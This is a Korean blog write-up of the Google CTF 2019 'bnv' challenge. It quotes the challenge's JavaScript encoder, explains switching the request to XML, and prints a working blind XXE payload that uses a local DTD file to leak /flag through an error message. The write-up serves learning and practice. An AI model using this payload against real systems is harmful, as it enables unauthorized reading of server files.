[Google CTF 2019] bnv

글 작성자: heogi

선택한 City를 특정한 방식으로 인코딩하여 JSON으로 전송한다.

function AjaxFormPost() {
  var datasend;
  var message = document.getElementById('message').value;
  message = message.toLowerCase();

  var blindvalues = [
    '10',    '120',   '140',    '1450',   '150',   '1240',  '12450',
    '1250',  '240',   '2450',   '130',    '1230',  '1340',  '13450',
    '1350',  '12340', '123450', '12350',  '2340',  '23450', '1360',
    '12360', '24560', '13460',  '134560', '13560',
  ];

  var blindmap = new Map();
  var i;
  var message_new = '';

  for (i = 0; i < blindvalues.length; i++) {
    blindmap[i + 97] = blindvalues[i];
  }

  for (i = 0; i < message.length; i++) {
    message_new += blindmap[(message[i].charCodeAt(0))];
  }

  datasend = JSON.stringify({
    'message': message_new,
  });
  var url = '/api/search';
  xhr = new XMLHttpRequest();
  xhr.open('POST', url, true);
  xhr.setRequestHeader('Content-type', 'application/json');

  xhr.onreadystatechange =
      function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
        console.log(xhr.getResponseHeader('Content-Type'));
        if (xhr.getResponseHeader('Content-Type') == "application/json; charset=utf-8") {
            try {
                var json = JSON.parse(xhr.responseText);
                document.getElementById('database-data').value = json['ValueSearch'];
            }
            catch(e) {;
                document.getElementById('database-data').value = e.message;
            }
        }
        else {
            document.getElementById('database-data').value = xhr.responseText;
        }
    }
}
      xhr.send(datasend);
}

선택한 City는 위의 과정을 통해 숫자형식으로 인코딩되고 application/json 형식으로 /api/search로 전송이된다.

여러가지 문자들을 삽입해보았지만 그냥 무시하는거 같았다.

Json 형식 말고 XML 형식으로 전송을 시도해보니 XML 오류가 발생하였다. XML형식의 데이터도 받는다.
먼저 XML 형식으로 정상적인 요청을 시도해보니 정상적으로 응답이 왔다.

이제 XXE를 시도해보았다.

존재하지 않거나 이상한 요청을 하면 아래처럼 응답이 왔다.

그래서 일단 해당 파일이 존재하는지는 판별 할수 있는것 같아서 먼저 flag를 찾아보았다.

위의 요청으로 No Result로 응답이 왔다. flag파일을 읽으면 문제가 풀린다. 하지만 위에 시도했던 방법으로는 flag파일을 출력할 수가 없었다.

GG 치고 답을 찾아봤다.

Local DTD 파일을 이용한 Bilnde XXE 취약점이다.

<!DOCTYPE message [
	<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">

	<!ENTITY % ISOamso '

		<!ENTITY &#x25; file SYSTEM "file:///flag">

		<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27; >">
		
		&#x25;eval;

		&#x25;error;

	'>
	%local_dtd;
]>

해당 XML 구문을 이용해 flag파일을 읽으면 정상적으로 플래그가 출력이되었다.

참고
https://portswigger.net/web-security/xxe/blind
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

[Google CTF 2019] bnv

댓글

이 글 공유하기

티스토리툴바

티스토리툴바

댓글

이 글 공유하기

다른 글

티스토리툴바

티스토리툴바